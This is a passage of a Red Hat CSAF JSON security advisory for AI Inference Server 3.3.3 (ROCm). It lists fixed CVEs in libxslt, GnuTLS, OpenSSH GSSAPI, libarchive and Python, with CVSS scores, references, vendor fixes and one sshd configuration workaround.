"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AI Inference Server 3.3.3 (ROCm) is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat\u00ae AI Inference Server",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:16009",
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "external",
"summary": "https://www.redhat.com/en/products/ai/inference-server",
"url": "https://www.redhat.com/en/products/ai/inference-server"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-40403",
"url": "https://access.redhat.com/security/cve/CVE-2023-40403"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-14831",
"url": "https://access.redhat.com/security/cve/CVE-2025-14831"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-23868",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25749",
"url": "https://access.redhat.com/security/cve/CVE-2026-25749"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26209",
"url": "https://access.redhat.com/security/cve/CVE-2026-26209"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27135",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27622",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28417",
"url": "https://access.redhat.com/security/cve/CVE-2026-28417"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28421",
"url": "https://access.redhat.com/security/cve/CVE-2026-28421"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30922",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33412",
"url": "https://access.redhat.com/security/cve/CVE-2026-33412"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3497",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4111",
"url": "https://access.redhat.com/security/cve/CVE-2026-4111"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42308",
"url": "https://access.redhat.com/security/cve/CVE-2026-42308"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42309",
"url": "https://access.redhat.com/security/cve/CVE-2026-42309"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42310",
"url": "https://access.redhat.com/security/cve/CVE-2026-42310"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42311",
"url": "https://access.redhat.com/security/cve/CVE-2026-42311"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4424",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4519",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5121",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5201",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_16009.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AI Inference Server 3.3.3 (ROCm)",
"tracking": {
"current_release_date": "2026-05-14T22:36:14+00:00",
"generator": {
"date": "2026-05-14T22:36:14+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:16009",
"initial_release_date": "2026-05-11T14:14:38+00:00",
"revision_history": [
{
"date": "2026-05-11T14:14:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-12T17:26:30+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:14+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AI Inference Server 3.3",
"product": {
"name": "Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ai_inference_server:3.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat AI Inference Server"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64",
"product_id": "registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vllm-rocm-rhel9@sha256%3Ada9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629?arch=amd64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778244531"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40403",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2025-03-04T12:01:50.826520+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2349766"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libxslt package. Processing web content may disclose sensitive information. This issue was addressed with improved memory handling.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libxslt: Processing web content may disclose sensitive information",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This CVE is a duplicate of CVE-2022-4909.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40403"
},
{
"category": "external",
"summary": "RHBZ#2349766",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2349766"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40403"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40403",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40403"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/10",
"url": "http://seclists.org/fulldisclosure/2023/Oct/10"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/3",
"url": "http://seclists.org/fulldisclosure/2023/Oct/3"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/4",
"url": "http://seclists.org/fulldisclosure/2023/Oct/4"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/5",
"url": "http://seclists.org/fulldisclosure/2023/Oct/5"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/6",
"url": "http://seclists.org/fulldisclosure/2023/Oct/6"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/8",
"url": "http://seclists.org/fulldisclosure/2023/Oct/8"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/9",
"url": "http://seclists.org/fulldisclosure/2023/Oct/9"
},
{
"category": "external",
"summary": "https://bugs.chromium.org/p/chromium/issues/detail?id=1356211",
"url": "https://bugs.chromium.org/p/chromium/issues/detail?id=1356211"
},
{
"category": "external",
"summary": "https://bugzilla.gnome.org/show_bug.cgi?id=751621",
"url": "https://bugzilla.gnome.org/show_bug.cgi?id=751621"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/94",
"url": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/94"
},
{
"category": "external",
"summary": "https://support.apple.com/en-us/HT213927",
"url": "https://support.apple.com/en-us/HT213927"
}
],
"release_date": "2023-09-26T20:14:54.697000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libxslt: Processing web content may disclose sensitive information"
},
{
"cve": "CVE-2025-14831",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-12-17T14:48:30.222000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2423177"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gnutls: GnuTLS: Denial of Service via excessive resource consumption during certificate verification",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat. GnuTLS is susceptible to a denial of service attack due to excessive CPU and memory consumption. This occurs when processing specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs) during certificate verification.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-14831"
},
{
"category": "external",
"summary": "RHBZ#2423177",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423177"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-14831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14831"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-14831",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14831"
},
{
"category": "external",
"summary": "https://gitlab.com/gnutls/gnutls/-/issues/1773",
"url": "https://gitlab.com/gnutls/gnutls/-/issues/1773"
}
],
"release_date": "2026-02-09T14:26:34.939000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "gnutls: GnuTLS: Denial of Service via excessive resource consumption during certificate verification"
},
{
"cve": "CVE-2026-3497",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-03-12T19:01:37.007806+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447085"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This vulnerability affects the OpenSSH GSSAPI delta as implemented in Red Hat Enterprise Linux and OpenShift Container Platform. An unauthenticated attacker could send a specially crafted GSSAPI message during key exchange, leading to the use of uninitialized variables and potentially undefined behavior. The severity of the impact is dependent on compiler hardening configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "RHBZ#2447085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447085"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://ubuntu.com/security/CVE-2026-3497",
"url": "https://ubuntu.com/security/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2026/03/12/3",
"url": "https://www.openwall.com/lists/oss-security/2026/03/12/3"
}
],
"release_date": "2026-03-12T18:27:44.917000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable GSSAPI key exchange in the OpenSSH server configuration. This prevents the server from processing GSSAPI messages, eliminating the vulnerability\u0027s attack surface.\n\nEdit `/etc/ssh/sshd_config` and add or modify the line:\n```\nGSSAPIKeyExchange no\n```\n\nAfter saving the changes, restart the `sshd` service for the mitigation to take effect. This action will prevent users from authenticating via GSSAPI.\n\n```\n# systemctl restart sshd\n```",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4111",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-11T11:18:51.609000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446453"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: Infinite Loop Denial of Service in RAR5 Decompression via archive_read_data() in libarchive",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team would likely assess the severity of this vulnerability as High because it allows remote attackers to cause a persistent denial-of-service condition using a small crafted archive file. Successful exploitation requires no authentication, no special configuration, and no user interaction in environments that automatically process uploaded archives. By repeatedly submitting malicious archives, an attacker can exhaust CPU resources or worker threads in services such as file upload systems, CI/CD pipelines, mail scanners, and content indexing services that rely on libarchive for archive extraction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4111"
},
{
"category": "external",
"summary": "RHBZ#2446453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446453"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4111"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4111",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4111"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2877",
"url": "https://github.com/libarchive/libarchive/pull/2877"
}
],
"release_date": "2026-03-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: Infinite Loop Denial of Service in RAR5 Decompression via archive_read_data() in libarchive"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4424",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-03-19T12:22:21.740000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449006"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This heap out-of-bounds read vulnerability in libarchive\u0027s RAR archive processing logic can lead to information disclosure. A remote attacker can exploit this flaw by providing a specially crafted RAR archive, potentially revealing sensitive heap memory information without requiring authentication or user interaction on systems that process untrusted archives.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "RHBZ#2449006",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4424",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4424"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2898",
"url": "https://github.com/libarchive/libarchive/pull/2898"
}
],
"release_date": "2026-03-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing"
},
{
"cve": "CVE-2026-4519",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-03-20T16:02:13.494105+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449649"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "RHBZ#2449649",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4519"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/143930",
"url": "https://github.com/python/cpython/issues/143930"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/143931",
"url": "https://github.com/python/cpython/pull/143931"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/",
